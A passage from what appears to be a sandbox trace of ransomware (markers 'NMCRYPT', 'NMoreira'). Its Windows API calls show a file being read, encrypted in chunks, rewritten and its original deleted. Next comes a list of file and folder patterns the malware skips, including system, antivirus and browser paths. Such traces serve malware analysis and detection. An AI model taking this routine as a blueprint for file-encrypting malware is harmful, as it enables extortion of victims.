pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.970] GetLastError () returned 0x0 [0162.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.970] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.970] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.970] GetLastError () returned 0x0 [0162.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.971] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.971] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.971] GetLastError () returned 0x0 [0162.971] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.971] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.971] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.971] GetLastError () returned 0x0 [0162.971] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.971] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xeb, lpOverlapped=0x0) returned 1 [0162.971] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xeb, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0162.971] GetLastError () returned 0x0 [0162.971] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0162.971] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0162.971] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0162.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0x20 [0162.972] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif", dwFileAttributes=0x20) returned 0 [0162.972] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif") returned 1 [0162.972] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0 [0162.972] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" [0162.972] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0162.972] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF004.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf004.tmp")) returned 0xf004 [0162.973] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF004.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf004.tmp"), dwFlags=0x1) returned 0 [0162.973] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF004.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf004.tmp")) returned 1 [0162.973] CryptDestroyKey (hKey=0x9ad278) returned 1 [0162.973] wcslen (_String="OK") returned 0x2 [0162.973] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.973] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.973] CryptDestroyKey (hKey=0x9ad738) returned 1 [0162.973] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0162.973] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0162.973] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.973] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*NMCRYPT") returned 0 [0162.973] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*Recovers your files.html") returned 0 [0162.973] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*.exe") returned 0 [0162.973] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*.dll") returned 0 [0162.973] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*.lnk") returned 0 [0162.973] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*.bat") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*.ini") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*.msi") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*.scf") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*pagefile.sys*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*NTUSER.DAT*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*AppData*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\winrar\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\java\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\TeamViewer\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\windows\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\ESET\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\AVG\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\AVIRA\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*\\AVAST Software\\*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*Atheros*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*Realtek*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*bootmgr*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*boot*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*boot*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*CONFIG.SYS*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*IO.SYS*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*MSDOS.SYS*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*NTDETECT.COM*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*ntldr*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*chrome*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*opera*") returned 0 [0162.974] PathMatchSpecW (pszFile="Connectivity.gif", pszSpec="*firefox*") returned 0 [0162.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif", pszSpec="*") returned 1 [0162.974] strlen (_Str="NMoreira") returned 0x8 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 